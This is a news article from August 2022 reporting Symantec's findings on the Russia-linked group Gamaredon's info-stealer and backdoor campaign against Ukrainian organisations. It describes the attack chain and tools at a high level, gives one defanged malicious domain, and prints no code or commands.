15 August 2022

Russia-linked Gamaredon is continuing to target Ukrainian orgs with info-stealers


Russia-linked Gamaredon is continuing to target Ukrainian orgs with info-stealers

A Russia-linked hacker group is continuing to attack organizations in Ukraine with info-stealing malware. The ongoing cyber campaign is said to be an extension of the attacks detailed by Ukraine’s computer emergency response team in July 2022.

Symantec’s Threat Hunter Team, part of Broadcom Software, shared the technical details on the campaign, which has been attributed to a known advanced persistent threat group Gamaredon (Armageddon or Shuckworm). The group has been active since 2014 and is exclusively focused on Ukraine.

In the observed campaign the attackers leveraged a self-extracting 7-Zip file, which was downloaded via the system’s default browser from a domain (a0698649[.]xsph[.]ru) that has been previously associated with Gamaredon activity. The domain was used in a phishing attack spoofing the Security Service of Ukraine with “Intelligence Bulletin” in the subject line, according to CERT-UA’s July security advisory.

The binaries in the 7-Zip files subsequently downloaded mshta.exe, an XML file, which was likely masquerading as a HTML application.

Upon downloading of the XML file onto victim networks, a PowerShell stealer is run on the victim’s machine. The researchers said they found three versions of this malware, which were all very similar, and likely were deployed as a means to evade detection.

Symantec also found Backdoor.Pterodo, a well-known Gamaredon tool, on victim machines, which came in the form of two VBS downloaders. These scripts are capable of calling PowerShell, uploading screenshots, and also executing code downloaded from a command-and-control (C&C) server.

In addition to the above-mentioned, the researchers observed Gamaredon deploying the Giddome backdoor, another well-known Gamaredon tool. Some of these Giddome variants may have originated from VCD, H264, or ASC files. Similar to .ISO files, VCD files are images of a CD or DVD recognized by Windows as an actual disc.

For remote access the threat actor leveraged the legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk - a common tactic used by ransomware and state-backed hacker groups.

“As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities. While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations,” Symantec concluded.

Back to the list

Latest Posts

Cyber security week in review: September 23, 2022

Cyber security week in review: September 23, 2022

The world in brief: Cryptomarket maker Wintermute robbed of $160M in a hack, old Python bug potentially affects 350,000 open-source projects, and more.
23 September 2022
Unpatched 15-year-old Python vulnerability puts at risk over 350,000 open-source projects

Unpatched 15-year-old Python vulnerability puts at risk over 350,000 open-source projects

The vulnerable Python tarfile module is found extensively in frameworks created by Netflix, AWS, Intel, Facebook, Google and other software.
22 September 2022
Malicious actors continue to abuse Google Tag Manager tool to install e-skimmers

Malicious actors continue to abuse Google Tag Manager tool to install e-skimmers

The researchers said they discovered three variants of malicious scripts hidden within GTM containers that function either as e-skimmers or as downloaders for installing e-skimmers.
21 September 2022